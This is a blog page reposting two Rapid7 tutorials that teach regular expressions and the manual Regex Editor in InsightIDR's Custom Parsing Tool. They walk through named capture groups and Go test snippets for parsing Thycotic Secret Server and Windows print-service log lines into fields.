Tag Archives: Detection and Response

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

Post Syndicated from Teresa Copple original https://blog.rapid7.com/2021/07/08/introducing-the-manual-regex-editor-in-idrs-parsing-tool-part-2/

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

I have logs on my mind right now, because every spring, as trees that didn’t survive the winter are chopped down, my neighbor has truckloads of them delivered to his house. All the logs are eventually burned up in his sugar house and used to make maple syrup, and it reminds me that I have some logs I’d like to burn to the ground, as well!

If you’re reading this blog, chances are you have some of these ugly logs that are messy, unstructured, and consequently, difficult to parse. Rather than destroy your ugly logs, however tempting, you can instead use the Custom Parsing tool in InsightIDR to break them up into usable fields.

Specifically, I will discuss here how to use Regex Editor mode, which assumes a general understanding of regular expression. If you aren’t familiar with regular expression or would like a short refresher, you may want to start with Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 1.

Many logs follow a standard format and can be easily parsed with the Custom Parsing tool using the default guided mode, which is quite easy to use and requires no regular expression.  You can read more about using guided mode here.

If your logs parse well with guided mode, you will likely want to stick with it. However, for logs that lack good structure or common delimiters, or that just do not parse correctly using guided mode, you may need to switch to Regex Editor mode to parse them.

Example 1: Key-Value Pair Logs Separated With Keys

Let’s start by looking at some logs in a classic format, which may not be obvious at first glance.

The first part of these logs has the fields separated by pipes (“|”). Logs that have a common delimiter, like a pipe, colon, space, etc., separating the values are usually easy to parse and can be parsed out in guided mode.

However, the problem with these logs is that the last part contains a string that’s separated by literal strings of text rather than a set character type. For example, if you look at the “msg” field, it is an unstructured string that might contain many different characters — the end of the value is determined by the start of the next key name, “rt”.

May 26 08:25:37 SECRETSERVER CEF:0|Thycotic Software|Secret Server|10.9.000033|500|System Log|3|msg=Login Failure - ts2000.com\hfinn - AuthenticationFailed rt=May 26 2021 08:25:37 src=10.15.4.56
May 26 08:25:37 SECRETSERVER CEF:0|Thycotic Software|Secret Server|10.9.000033|500|System Log|3|msg=Login attempt on node SECRETSERVER by user hfinn failed: Login failed. rt=May 26 2021 08:25:37 src=10.15.4.56

Let’s see how parsing these logs with the Custom Parsing Tool works. I have followed the instructions at https://docs.rapid7.com/insightidr/custom-parsing-tool/ and started parsing out my fields. Right away, you can see I’m having a problem parsing out the “msg” field in guided mode. It’s not working like I want it to!

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

This is where it is a good idea to switch to Regex Editor mode rather than continuing in guided mode. As such, I have selected the Regex Editor, and you can see that displayed here:

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

Whoa! This regex might look daunting at first, but just remember from our previous lesson that you can use an online regex cheat sheet or expression builder to make sense of any parts you find confusing or unclear.

Here is what the Regex Editor has so far, based on the two fields I added from guided mode (date and message):

^(?P<date>(?:[^:]*:){2}[^ ]+)[^=]*=(?P<message>[^d]*d)

The regular expression for the field I decided to name “message” is the part that’s not working like I want. So, I need to edit this part: (?P<message>[^d]*d).

Remember, this is a capture group, so the regular expression following the field name, “<message>”, will be used to read the logs and extract the values for each one. In other words, in Log Search, the key-value pair will be extracted out from the logs as follows:

(?P<key>regex that will extract the value)

“[^d]*d” is not working, so let’s figure out how to replace that. There are a lot of ways to go about crafting a regular expression that will extract the field. For example, one option might be to extract every character until you get to the next literal string:

^(?P<date>(?:[^:]*:){2}[^ ]+)[^=]*=(?P<message>.*)rt=

This works, but it is somewhat inefficient for parsing. It’s outside our scope here to discuss why, but in general, you should not use the dot star, “.*”, for parsing rules. It is much more efficient to define what to match rather than what to not match, so whenever possible, use a character class to define what should be matched.

Create the character class and put all possible characters that appear in the field into it:

^(?P<date>(?:[^:]*:){2}[^ ]+)[^=]*=(?P<message>[\w\s\.-\\]+)

These Thycotic logs have a lot of different characters appearing in the “msg” field, so defining a character class like I’m doing here, “[\w\s\.-\\]”, is a bit like playing pin the tail on the donkey, in that I hope I get them all!

Let’s look at another way to extract a text string when it does not have a standard format. Remember that “\d” will match any digit character. Its opposite is “\D”, which matches any non-digit character. Therefore, “[\d\D]+” matches any digit or non-digit character:

^(?P<date>(?:[^:]*:){2}[^ ]+)[^=]*=(?P<message>[\d\D]+)rt=
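
If you want to sanity-check a rule like this outside of InsightIDR, one option is a short Go program, since Go’s regexp package is RE2, the same flavor InsightIDR uses. Here is a minimal sketch that applies the exact pattern above to the first sample log line; the expected fields are noted in the comments:

package main

import (
    "fmt"
    "regexp"
)

func main() {
    // First sample log line from above; a raw string keeps the backslash literal.
    line := `May 26 08:25:37 SECRETSERVER CEF:0|Thycotic Software|Secret Server|10.9.000033|500|System Log|3|msg=Login Failure - ts2000.com\hfinn - AuthenticationFailed rt=May 26 2021 08:25:37 src=10.15.4.56`

    // The rule built above; Go's regexp package is RE2, the flavor InsightIDR uses.
    re := regexp.MustCompile(`^(?P<date>(?:[^:]*:){2}[^ ]+)[^=]*=(?P<message>[\d\D]+)rt=`)

    m := re.FindStringSubmatch(line)
    if m == nil {
        fmt.Println("no match")
        return
    }
    // Pair each captured value with its group name.
    for i, name := range re.SubexpNames() {
        if name != "" {
            fmt.Printf("%s = %q\n", name, m[i])
        }
    }
    // Expect date to be "May 26 08:25:37" and message to run up to the "rt=" key.
}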

One thing to point out here is that, although defining the specific values in the character class was a bit futzy to extract the “msg” field, this method works very well when parsing out host and user names.

In most cases, host and user names will contain only letters, numbers, and the “-” symbol, so a character class of “[\w\d-]” works well to extract them. If the names also contain a FQDN, such as “hfinn.widgets.com”, then you also need to extract the period: “[\w\d\.-]”.
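
As a quick illustration (the names here are made up, not taken from the logs above), that class with the period added matches plain host names, user names, and FQDNs alike:

package main

import (
    "fmt"
    "regexp"
)

func main() {
    // Hypothetical names for illustration; "\w" already covers digits, so "\d"
    // is redundant here, but the class mirrors the one described above.
    re := regexp.MustCompile(`^[\w\d\.-]+$`)
    for _, name := range []string{"san-dc01", "hfinn", "hfinn.widgets.com"} {
        fmt.Println(name, re.MatchString(name)) // all three print true
    }
}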

Example 2: Unstructured Logs

Let’s look at some logs that are challenging to parse due to the field structure.

Logs that do not have the same fields in every log and that do not have standard breaks to delineate the fields, while nicely human readable, are more difficult for a machine to parse.

<14>May 27 16:25:31 tkxr7san01.widgets.local MSWinEventLog	1	 Microsoft-Windows-PrintService/Operational	5793	Mon May 27 16:25:31 2021 	805	Microsoft-Windows-PrintService	hfinn	User	Information	 tkxr7san01.widgets.local	Print job diagnostics		Rendering job 71.	 2447840
<14>May 27 16:25:31 tkxr7san01.widgets.local MSWinEventLog	1	 Microsoft-Windows-PrintService/Operational	5794	Mon May 27 16:25:31 2021 	307	Microsoft-Windows-PrintService	hfinn	User	Information	 tkxr7san01.widgets.local	Printing a document		Document 71, Print Document owned by hfinn on lpt-hfinn01 was printed on XEROX1001 through port XEROX1001. Size in bytes: 891342. Pages printed: 2. No user action is required.	2447841

Let’s take a look at how we can parse out the fields in this log using guided mode. When you are using the Custom Parsing Tool, one of the first things you need to decide is if you want to create a filter for the rule:

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

With logs, the device vendor decides what fields to create and how the logs will be structured. Some vendors create their logs so all have the same fields in every log line, no matter what the event. If your logs look like this, then you will not need to use a filter.

Other vendors define different fields depending on the type of event. In this case, you will probably need to use a filter and create a separate rule for each type of event you want to parse. Another reason to use a filter is that you just want to parse out one type of event.

Looking at my Microsoft print server logs closely, you can see that the second log has quite a few more fields than the first one: document name printed, the document owner, what printer it was printed on, size, pages printed, and if any user action is required. As such, I’m going to need to use filters and create more than one rule here.

The filter should be a literal string that is part of the logs I want to parse. In other words, how can the parsing tool know which logs to apply this rule to? Let’s start with the first type of log:

<14>May 27 16:25:31 tkxr7san01.widgets.local MSWinEventLog	1	 Microsoft-Windows-PrintService/Operational	5793	Mon May 27 16:25:31 2021 	805	Microsoft-Windows-PrintService	hfinn	User	Information	 tkxr7san01.widgets.local	Print job diagnostics		Rendering job 71.	 2447840

Its type is “Print job diagnostics”, so that seems like a good string to match on. I will use that for my filter.

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

Still in the default guided mode, I’ll start extracting out the fields I want to parse. I don’t need to parse them all, just the ones I care about. As I am working my way through the log, I find that I am not able to extract the username like I want:

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

I am going to continue for the moment, however, using guided mode to define the last field I need to add.

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

Let’s pause for a moment. I’ve created four fields. Three of them are fine, but the “source_user” field is not parsing correctly. I am going to switch now to Regex Editor mode to fix it.

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

The regex created by the Custom Parsing Tool in guided mode is:

^(?:[^ ]* ){3}(?P<source_host>[^ ]+)(?:[^ ]* ){4}(?P<datetime>[^	]+)[^m]+(?P<source_user>[^ ]+)[^P]+(?P<action>[^	]+)

The only part I need to look at is the capture group for the field I called “source_user”:

(?P<source_user>[^ ]+)

With that said, the issue with the rule could be somewhere else in the parsing rules. However, let’s just start with the one capture group. Let’s interpret the character class first: “[^ ]”.  

When the hat symbol (“^”) appears in a character class, it means “not”. The hat is followed by a space, so the character class is “not a space”. Therefore, “[^ ]+” means “read in values that are not spaces” or “read until you get to a space”.  

Looking at the entire parsing rule, you can see it is counting the number of spaces to define what goes into each field. This would work out fine if spaces were the field delimiters, but that’s not how these logs work. The logs are a bit unstructured in the sense that some of the fields are defined by literal strings and others are just literal strings themselves.

Also, guided mode had a few too many beers while trying to cope with these silly logs and decided that the “source_user” field should always start with the letter “m”:

[^m]+(?P<source_user>[^ ]+)  

Oops! We don’t want that! Let’s get rid of it, plus the “[^P]+”, which means to read everything up to a literal capital P: this is how it is rolling past everything to the “Print job diagnostics”, but we can do better than that.

As humans, we know that we want the “action” field to be the literal string “Print job diagnostics”, which the Custom Parsing Tool doesn’t know. Let’s just fix these few things first. I made these changes, clicked on Apply to test them, and got an error:

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

This error means I’ve goofed, and the rule does not match my logs. I know I’m on the right path, though, so I’m going to continue. The problem here is with how the regex is going from “datetime” to “source_user” and then to “action”.

Let’s stop for a moment to look at this regex:

(?:[^ ]* ){3}

The “(?P<keyname>)” structure that we’ve been using is a capture group. The “(?:)” structure is a non-capture group. It means that regex should read this but not actually capture it or do anything with it. It’s also how we are going to skip past the fields we don’t want to parse. The “{3}” means “three times”. Of course, we have already seen that “[^ ]*” means “not a space” or “read until you get to a space”. So, the whole non-capture group “(?:[^ ]* ){3}” means “read everything up to and including the next space, three times” or “skip past everything that is in the log until you have read past three spaces”.
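
To see the skip-and-capture idea in action outside the tool, here is a minimal Go sketch (again, Go’s regexp is RE2). It uses only the space-separated start of the print-server log from above, with the rest of the line elided:

package main

import (
    "fmt"
    "regexp"
)

func main() {
    // Only the space-separated start of the print-server log matters here;
    // the rest of the line is elided.
    line := "<14>May 27 16:25:31 tkxr7san01.widgets.local MSWinEventLog ..."

    // Skip three space-terminated chunks, then capture the next one.
    re := regexp.MustCompile(`^(?:[^ ]* ){3}(?P<source_host>[^ ]+)`)

    m := re.FindStringSubmatch(line)
    fmt.Println(m[re.SubexpIndex("source_host")]) // tkxr7san01.widgets.local
}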

Now, let’s look at an actual log:

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

The last field we read in was “datetime”, and then, we need to skip over to the “source_user” field. Let’s try to do that by skipping past the three spaces until we get there.

Next, from the “source_user” to the last field, “action”, there are four spaces. Here is my regex:

^(?:[^ ]* ){3}(?P<source_host>[^ ]+)(?:[^ ]* ){4}(?P<datetime>[^ ]+)(?:[^ ]* ){3}(?P<source_user>[^ ]+)(?:[^	]* ){4}(?P<action>Print job diagnostics)

I have added “(?:[^ ]* ){3}“ to skip past 3 spaces and done the same thing later to skip past 4 spaces, using a “{4}” to denote 4 spaces. Let’s see if it works:

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

The tool seems to be happy with this, as all the fields appear correctly, so I will go ahead with applying and saving this rule.

If you are at this spot with your own logs but the tool is not happy and you are getting an error, I have a couple of tips for you to try:

  • Sometimes, the tool works better if you do parse every field, even if you do not particularly care about them. Try parsing every field to see if that works better for you.
  • Occasionally, it is easier to just parse out one (or maybe two or three) fields per rule. This is especially true if the logs are very messy and the fields have little structure. If you are really stuck, try to parse out just one field at a time. It is okay to have several parsing rules per log type, if necessary.
  • Try to proceed one field at a time, if possible. Get the one field extracted correctly, and then proceed to the next one.

When you create a parsing rule, it will apply to new logs that are collected. I have waited a bit for more logs to come in, and I can see they are now parsing as expected.

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

Now, I need to create a second rule for the next type of log. Here is what those logs look like:

<14>May 27 16:25:31 tkxr7san01.widgets.local MSWinEventLog	1	 Microsoft-Windows-PrintService/Operational	5794	Mon May 27 16:25:31 2021 	307	Microsoft-Windows-PrintService	hfinn	User	Information	 tkxr7san01.widgets.local	Printing a document  Document 71, Print Document owned by hfinn on lpt-hfinn01 was printed on XEROX1001 through port XEROX1001. Size in bytes: 891342. Pages printed: 2. No user action is required.	2447841

When you create a second (or third, fourth, etc.) parsing rule for the same logs, the Custom Parsing Tool does not know about the previous rules. You will need to start any additional rules just as you did the first one.

Also, just like before, as I am creating the parsing rule, I will need to apply a filter to match these logs. The type of log is “Printing a document”, so I will use that as the filter.

Again, I will start in guided mode and define the fields I want to start parsing out — it isn’t required to start in guided mode but, sometimes, that is easier. I defined a few fields, and as you can see, the parsing is not working like I need.

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

Now that I have the fields defined, I’ll switch to Regex Editor mode.

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

The regex that was generated in guided mode is:

^(?:[^ ]* ){4}(?P<datetime>[^ ]+)[^h]{36}(?P<source_user>[^ ]+)\D{18}(?P<source_host>[^	]+) (?P<action>[^ ]+)	(?P<printed_document>(?:[^ ]* ){3}[^ ]+)(?:[^ ]* ){6}(?P<owner>[^ ]+)

Just like before, I am going to clean this up a bit, starting with the first field and working from left to right, modifying the regex to parse out the keys like I want.

The first part of the regex, “^(?:[^ ]* ){4}(?P<datetime>[^ ]+)”, says to skip past the first four spaces and read the next part into the datetime key until a fifth space is read. This first part is fine and parsing out the field as needed, so let’s move on to the next part, “[^h]{36}(?P<source_user>[^ ]+)”.  

For simplicity and functionality, I am going to swap out the way the regex is skipping over to the username, “[^h]{36}”, with “(?:[^ ]* ){3}”.  This is using the same logic as the first rule: skip past three spaces to find the next value to read in.  

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

These first two fields are working, so let’s move to the next one, “source_host”. The regex for skipping over to this field and parsing it is: “\D{18}(?P<source_host>[^ ]+)”.

While this might look odd, the “\D{18}” part is how regex skips over the literal string “User Information”.  We looked at “\D” previously; the “\D” means to match “any non-digit character”, and the “{18}” means “18 times”. In other words, skip forward 18 non-digit characters. This is working well, and there is no need for any tinkering.

The next field is “(?P<action>[^ ]+)”, and just like the previous one, this field is properly parsed out. If a field is properly parsed, then there is no need to make any changes.

Now, I am getting to the messiest field in the logs, which is the name of the document that was printed. You can see that the field should contain all the text between “Printing a document” and “owned by”, and it is not being correctly parsed with the auto-generated regex.

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

Hey, we humans are still better at some things than machines! While this field is easy for us to make out, machine-generated regex has difficulty with these types of fields.

Let’s look at the current method that regex is using. The field is parsed with “(?P<printed_document>(?:[^ ]* ){3}[^ ]+)”, which means the parser is counting spaces to try to determine the field, and that just doesn’t work here. We need to craft a regular expression that will parse everything until we get to “owned by”, no matter what it is.

The best way to do this is to create a character class that includes all the possible characters that might be in the field to be extracted. Because a document can contain any possible character, I am going to use the class “[\d\D]”, which I used previously. To say “followed by the literal string owned by”, I need to be careful and take into account the spaces.

Spaces can be a little tricky in that, sometimes, what your eyes perceive as one space is actually several. To be on the safe side, instead of specifying one space with “\s”, you might want to use “\s+”. You could also put an actual space there. That is what the auto-generated regex has; however, I prefer to use the “\s+” notation, as it makes it clear that I want to match one or more spaces.

(?P<printed_document>[\d\D]+)\s+owned\s+by\s+

Before continuing, I am checking to make sure the “printed_document” field is parsed properly.  

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

It all looks good! If it didn’t, I would fiddle with the parsing until it did. The last field, “owner”, is parsing correctly, as well.

Drat! I need to extract one more field, and I forgot to define it in guided mode. That’s okay, however, because I can go ahead and add it right now. All I need to do is to create a named capture group for it.

We looked at the syntax for a named capture group earlier:

(?P<key>regex that will extract the value)

I want to collect how many pages were printed, so let’s look at our logs again. I’m working on this part of the log:

owned by mstewart on \\L-mstewart03 was printed on Adobe PDF through port Documents\*.pdf. Size in bytes: 0. Pages printed: 13.

I need to skip forward from the “owned by” value all the way over to “Pages printed”. The fields in between might have different numbers of spaces, characters, etc., which means I can’t count spaces like I did before. I can’t count the number of characters, either.

Let’s use our old friend “[\d\D]”:    

(?:[\d\D]+)Pages printed:\s+(?P<pages_printed>\d+)
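
Here is a minimal Go sketch (RE2, like InsightIDR) that applies just this fragment to the log snippet quoted above and pulls out the page count:

package main

import (
    "fmt"
    "regexp"
)

func main() {
    // The log fragment quoted above; a raw string keeps the backslashes literal.
    tail := `owned by mstewart on \\L-mstewart03 was printed on Adobe PDF through port Documents\*.pdf. Size in bytes: 0. Pages printed: 13.`

    re := regexp.MustCompile(`(?:[\d\D]+)Pages printed:\s+(?P<pages_printed>\d+)`)

    m := re.FindStringSubmatch(tail)
    fmt.Println(m[re.SubexpIndex("pages_printed")]) // 13
}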

The tool seems happy with this, as there are no errors when I click on Apply, and the fields in the Log Preview appear to be correct.

When I apply and save this rule, I wait for a few more logs to come in to see if the parsing rule is working like I want. In Log Search, here is a parsed log line:

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 2

You might be wondering what the “\t” is all about. The “\t” is a tab character, and it tells me I’m not quite satisfied with my parsing rule. I didn’t spot when I saved it that there is whitespace being captured at the beginning of the field. If you find, after you save a rule, that it isn’t working like you want, you can either delete it and start over or just modify the existing rule.

I am going to modify my rule and fix it. Here is my final regex with the extra spaces accounted for:

^(?:[^ ]* ){4}(?P<datetime>[^ ]+)(?:[^	]* ){3}(?P<source_user>[^	]+)\D{18}(?P<source_host>[^	]+) (?P<action>[^ ]+)\s+(?P<printed_document>[\d\D]+)\s+owned\s+by\s+(?P<owner>[^ ]+)(?:[\d\D]+)Pages printed:\s+(?P<pages_printed>\d+)

And that’s it! With this guide, you have now learned how to use the Custom Parsing tool in InsightIDR to break up ugly logs into usable fields.



Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 1

Post Syndicated from Teresa Copple original https://blog.rapid7.com/2021/07/06/introducing-the-manual-regex-editor-in-idrs-parsing-tool-part-1/

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 1

New to writing regular expressions? No problem. In this two-part blog series, we’ll cover the basics of regular expressions and how to write regular expression statements (regex) to extract fields from your logs while using the custom parsing tool. Like learning any new language, getting started can be the hardest part, so we want to make it as easy as possible for you to get the most out of this new capability quickly and seamlessly.

The ability to analyze and visualize log data — regardless of whether it’s critical for security analytics or not — has been available in InsightIDR for some time. If you prefer to create custom fields from your logs in a non-technical way, you can simply head over to the custom parsing tool, navigate through the parsing tool wizard to find the “extract fields” step, and drag your cursor over the log data you’d like to extract to begin defining field names.

The following guide will give you the basic skills and knowledge you need to write parsing rules with regular expressions.

What Are Regular Expressions?

In technical applications, you occasionally need a way to search through text strings for certain patterns. For example, let’s say you have these log lines, which are text strings:

May 10 12:43:12 SECRETSERVERHOST CEF:0|Thycotic Software|Secret Server|10.9.000002|500|System Log|7|msg=The server could not be contacted. rt=May 10 2021 12:43:12
May 10 12:43:41 SECRETSERVERHOST CEF:0|Thycotic Software|Secret Server|10.9.000002|500|System Log|7|msg=The RPC Server is unavailable. rt=May 10 2021 12:43:41

You need to find the message part of the log lines, which is everything between “msg=” and “rt=”.  With these two log lines, I might hit the easy button and just copy the text manually, but clearly, this approach won’t work if I have hundreds or thousands of lines from which I need to pull the field out.

This is where regular expression, often shortened to regex, comes in. Regex gives you a way to search through text to match patterns, like “msg=”, so you can easily pull out the text you need.

How Does It Work?

I have a secret to share with you about regular expression: It’s really not that hard. If you want to learn it in great depth and understand every feature, that’s a story for another day. However, if you want to learn enough to parse out some fields and get on with your life, these simple tips will help you do just that.

Before we get started, you need to understand that regex has some rules that must be followed.  The best mindset to get the hang of regex, at least for a little while, is to follow the rules without worrying about why.

Here are some of the basic regular expression rules:

  • The entire regular expression is wrapped with forward slashes (“/”).
  • Pattern matches start with backslashes (“\”).
  • It is case-sensitive.
  • It requires you to match every character of the text you are searching.
  • It requires you to learn its special language for matching characters.

The special language of regular expression is how the text you are searching is matched. You need to start the pattern match with a backslash (“\”). After that, you should use a special character to denote what you want to match. For example, a letter or “word character” is matched with “\w” and a number or “digit character” is matched with “\d”.

If we want to match all the characters in a string like:

cat

We can use “\w”, as “\w” matches any “word character” or letter, so:

\w\w\w

This matches the three characters “c”, “a”, and “t”. In other words, the first “\w” matches the “c” character; “\w\w” matches “ca”; and “\w\w\w” matches “cat”.

As you can see, “\w” matches any single letter from “a” to “z” and also matches letters from “A” to “Z”. Remember: Regex is case sensitive.

“\w” also matches any number. However, “\w” does NOT match spaces or other special characters, like “-”, “:”, etc. To match other characters, you need to use their special regex symbols or other methods, which we’ll explore here.

Getting Started With Regex

Before we keep going, now is a good time to take a few minutes to find a regex “cheat sheet” you like.

Rapid7 has one you can use: https://docs.rapid7.com/insightops/regular-expression-search/, or you may have a completely different one you prefer. Whatever the case is for you, these guides are helpful in keeping track of all your matching options.

While we’re at it, let’s also find a regex testing tool we can use to practice our regex. https://regex101.com/ is very popular, as it is a tool and cheat sheet in one, although you may find another tool you want to use instead.

InsightIDR supports the version of regex called RE2, so if your testing tool supports the Golang/RE2 flavor, you might want to select it to practice the specific flavor InsightIDR uses.

To follow along with me, open your preferred tool for testing regex. Enter in some text to match and some regex, and see what happens!

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 1

Let’s look at another way to match the string “cat”. You can use literals, which means you just enter the character you want to match:

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 1

This means you literally want to match the string “cat”. It matches “cat” and nothing else.  
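
If you would rather follow along in code than in a browser tool, here is a minimal sketch using Go’s regexp package, which is RE2, the same flavor InsightIDR uses. It simply checks whether a pattern matches some text:

package main

import (
    "fmt"
    "regexp"
)

func main() {
    // Both patterns we have tried so far match the string "cat".
    for _, pattern := range []string{`\w\w\w`, `cat`} {
        matched, err := regexp.MatchString(pattern, "cat")
        if err != nil {
            panic(err) // only happens if the pattern itself is invalid
        }
        fmt.Println(pattern, matched) // both print true
    }
}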

Let’s look at another example. Say I need to match the string:

san-dc01

As we saw earlier, you can use “\w” to match the word characters. To match a number, you can use “\w” or “\d”.  “\d” will match any number or “digit”. However, how can you match the “-”?

The dash (“-”) is not a word character, so “\w” does not match it. In this case, we can tell regex we want to match the “-” literally:

\w\w\w-\w\w\d\d

There are other options, as well. The dot or period character (“.”) in regex means to match any single character. This works to parse out the string “san-dc01”, as well:

\w\w\w.\w\w\d\d

While this works, it is tedious typing all these “\w”s. This is where wildcards, sometimes called regex quantifiers, come in handy.

The two most common are:

* match 0 or more of the preceding character

+ match 1 or more of the preceding character

“\w*” means “match 0 or more word characters”, and “\w+” means “match 1 or more word characters”.

Let’s use these new wildcards to match some text. Say we have these two strings:

cat

san-dc01

I want one regex pattern that will match both strings. Let’s match “cat” first. The regex we used previously:

\w\w\w

matches the string, so you can see that using this wildcard would work, too:

\w+

Now, let’s look at matching “san-dc01”. I can use this:

\w+-\w+

This means “match as many word characters as there are, followed by a dash, and then followed by as many word characters as there are”. However, while this matches “san-dc01”, it does not match “cat”. The string “cat” has no “-” followed by characters.

The regex we added, “-\w+”, only matches a string if the “-” character is part of the string. In addition, “\w+” means “match one or more word characters”. In other words, “\w+” means “match at least one word character up to as many as there are”. As such, we need to use “\w*” here instead to specify that the “dc01” part of the string might not always exist. We also need to use “-*” to specify that the “-” might not always exist in the string we need to match, either.

Therefore, this should work to parse both strings:

\w+-*\w*

By now, you may have noticed something else important about regex: There are usually many different patterns that will match the same text.

Sometimes, I find that people get snooty about their regex, and these people might mock you if they think you could have crafted a shorter pattern or a more efficient one. A pox on their house!  Don’t worry about that right now. It’s more important that your regex pattern works than it is that it be short or impressively intricate.

Let’s look at another way to match our strings: You can use a character class for matching.

The character class is defined by using the square brackets “[“ and “]”. It simply means you want regex to match anything included in your defined class.

This is easier than it sounds! Since our strings “cat” and “san-dc01” contain characters that match either “\w” or the literal “-”, our character class is “[\w-]”.

Now, we can use the “+” to specify that our string has one or more characters from the character class:

[\w-]+
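
Here is a minimal Go sketch comparing the three patterns we have discussed against both strings. Note that I have anchored each pattern with “^” and “$” so the whole string has to match; the anchors are my addition, not part of the original patterns, but they make the comparison clearer:

package main

import (
    "fmt"
    "regexp"
)

func main() {
    inputs := []string{"cat", "san-dc01"}
    patterns := []string{`^\w+-\w+$`, `^\w+-*\w*$`, `^[\w-]+$`}

    for _, p := range patterns {
        re := regexp.MustCompile(p)
        for _, s := range inputs {
            fmt.Printf("%-12s %-10s %v\n", p, s, re.MatchString(s))
        }
    }
    // Only the first pattern fails on "cat"; the other two match both strings.
}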

Additional Regular Expressions for Log Parsing

Besides “\w” and “\d”, I have a few more regular expressions I want you to pay close attention to. The first one is “\s”, which is how you match whitespaces.

“\s” will match any whitespace character, and “\s+” will match one or more whitespace characters.

Next, remember that the dot (“.”) will match any character. The dot becomes especially powerful when you combine it with the star (“*”).  Remember: The star means to match 0 or more characters. Therefore, the “dot star” (“.*”) will match any characters as many times as they appear, including matching nothing. In other words, “.*” matches anything.

Finally, let’s look at special uses of the circumflex character, which is often just called the hat (“^”).

The hat has two completely different uses, which should not be confused. First, when used by itself, the hat in regex designates where the beginning of the line starts. For example, “^\w+” means that the line must start with a word.

The second use of the hat is when it appears in a character class. If you use the hat character when defining a character class, it means “everything except” as in “match everything except these characters”. In other words, “[\d]+” would match any digit character, while “[^\d]+” means to do the opposite or match everything except for any digit character!

Log Parsing Examples

Let’s go back to where we started, trying to parse out the msg field from our logs:

May 10 12:43:12 SECRETSERVERHOST CEF:0|Thycotic Software|Secret Server|10.9.000002|500|System Log|7|msg=The server could not be contacted. rt=May 10 2021 12:43:12
May 10 12:43:41 SECRETSERVERHOST CEF:0|Thycotic Software|Secret Server|10.9.000002|500|System Log|7|msg=The RPC Server is unavailable. rt=May 10 2021 12:43:41

Have you copied and pasted these log lines into your regex tester? If not, go ahead and do so now.

We need to parse a literal string “msg=”. These literals in log lines are often the “key” part of a key-value pair and are sometimes called anchors instead of literals, since they are the same in every log line. To parse them, you would usually specify the literal string to match on.

Next, we need to read the value that follows. You have a few different approaches you can use here. A common way to parse the value is to read everything that follows until the next literal or anchor. Remember: There are many ways to do this, but your regex might look like this:

msg=.*rt=

By the way, if you are familiar with regex, you know that the greedy “*” creates inefficient parsing rules, but let’s not worry too much about that right now. The skinny on this, however, is that you should never use the dot star (“.*”) for parsing rules. It is useful for searches and trying to figure out log structure, though.

Another way to read the value is to use a character class:

msg=[\w\s\.]+rt=

Let’s break the character class down to determine exactly what is specified. “\w” means match any word character. “\s” means to match any space. We also need to match a literal period, since that appears in the msg value, but the period or dot has a special meaning in regex. When characters have special meaning in regex, like the slashes, brackets, dot, etc, they need to be “escaped”, which you do by putting a backslash (“\”) in front of them. Therefore, to match the period, we need to use “\.” in the character class.

Remember: Defining a character class means you want to match any character defined in the class, and the “+” at the end of the class means to “match one or more of these characters”. In that case, “[\w\s\.]+” means “match any word character, any space, or a period as many times as it occurs”. The matching will stop when the next character in the sequence is not a word character, a space, or a period OR when the next part of the regex is matched. The next part of the regex is the literal string “rt=”, so the regex will extract the “[\w\s\.]+” characters until it gets to “rt=”.

Finally, there is just one more regex syntax that is helpful to understand when using regex with InsightIDR, and that is the use of capture groups. A capture group is how you define key names in regex. Capture groups are actually much more than this, but let’s narrow our focus to just what we need to know for using them with InsightIDR. To specify a named capture group for our purposes, use this syntax:

(?P<keyname>putyourregexhere)

The regex you put into the capture group is what is used to read the value that is going to match the “keyname”. Let’s see how this works with our logs.

Say we have some logs in key-value pair (KVP) format, and we want to both define and parse out the “msg” key. We know this regex works to match our logs: “msg=[\w\s\.]+rt=”. Now, we need to take this one step further and define the “msg” key and its values. We can do that with a named capture group:

msg=(?P<msg>[\w\s\.]+)rt

Introducing the Manual Regex Editor in IDR’s Parsing Tool: Part 1

Let’s break this down. We want to read in the literal string “msg=” and then place everything after it into a capture group, stopping at the literal string “rt=”. The capture group defines the key, which you can also think of as a “field name”, as “msg”: “(?P<msg>”.

If we wanted to parse the field name as something else, we could specify that in between the “<>”. For example, if we wanted the field name to be “message” instead of “msg”, we would use: “(?P<message>”.

The regex that follows is what we want to read for the value part of our key-value pair. In other words, it is what we want to extract for the “msg”. We already know from our previous work that the character class “[\w\s\.]” matches our logs, so that’s what is used for this regex.
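
To tie it all together, here is a minimal Go sketch (RE2, the flavor InsightIDR uses) that runs the capture group above against the first sample log line from the top of this post and prints the extracted value:

package main

import (
    "fmt"
    "regexp"
)

func main() {
    // First sample log line from the top of this post.
    line := "May 10 12:43:12 SECRETSERVERHOST CEF:0|Thycotic Software|Secret Server|10.9.000002|500|System Log|7|msg=The server could not be contacted. rt=May 10 2021 12:43:12"

    re := regexp.MustCompile(`msg=(?P<msg>[\w\s\.]+)rt`)

    m := re.FindStringSubmatch(line)
    fmt.Printf("msg = %q\n", m[re.SubexpIndex("msg")])
    // msg = "The server could not be contacted. "
}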

In this blog, we explored the regex syntax we need for InsightIDR and used a generic tool to test our regular expressions. In the next blog, we’ll use what we covered here to write our own parsing rules in InsightIDR using the Custom Parsing Tool in Regex Editor mode.



